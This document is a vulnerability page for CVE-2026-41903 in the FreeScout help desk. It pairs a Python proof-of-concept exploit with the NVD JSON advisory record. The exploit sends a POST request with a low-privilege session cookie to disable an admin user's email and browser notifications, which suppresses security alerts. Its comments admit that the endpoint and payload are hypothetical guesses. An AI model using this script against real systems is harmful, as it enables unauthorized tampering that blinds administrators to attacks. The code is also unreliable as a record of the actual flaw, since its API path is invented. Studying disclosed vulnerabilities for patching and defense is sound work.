CVE-2026-41903

# Proof of Concept for CVE-2026-41903 # Description: Exploit script to disable notifications for an admin user # Requirement: Valid session cookie for a user with PERM_EDIT_USERS permission import requests def exploit(target_url, admin_user_id, session_cookie): """ Send a malicious POST request to disable admin notifications. """ headers = { "Cookie": session_cookie, "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Payload to disable email and browser notifications # The exact JSON structure depends on the FreeScout API implementation payload = { "subscriptions": { "email_new_reply": False, "browser_new_reply": False } } # Endpoint to update user notifications (hypothetical based on description) url = f"{target_url.rstrip('/')}/api/v1/users/{admin_user_id}/notifications" try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Success: Admin notifications have been disabled.") else: print(f"[-] Failed: Server returned status code {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": # Example usage TARGET = "http://example-freescout.com" ADMIN_ID = "1" COOKIE = "freescout_session=attacker_session_token_here" exploit(TARGET, ADMIN_ID, COOKIE)

{"cve": {"id": "CVE-2026-41903", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:00.950", "lastModified": "2026-05-07T19:51:36.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user holding the PERM_EDIT_USERS permission (intended for general user-profile editing) can read and modify the notification subscriptions of any other user, including admins, by sending a single POST request. This is a sibling of CVE-2025-48472's notification authorization bypass — the prior fix did not cover this code path. A non-admin attacker can silently disable an admin's email/browser/mobile notifications, suppressing security alerts and conversation-assignment notices. This issue has been patched in version 1.8.217."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-f489-qxv6-gvgg", "source": "[email protected]"}]}}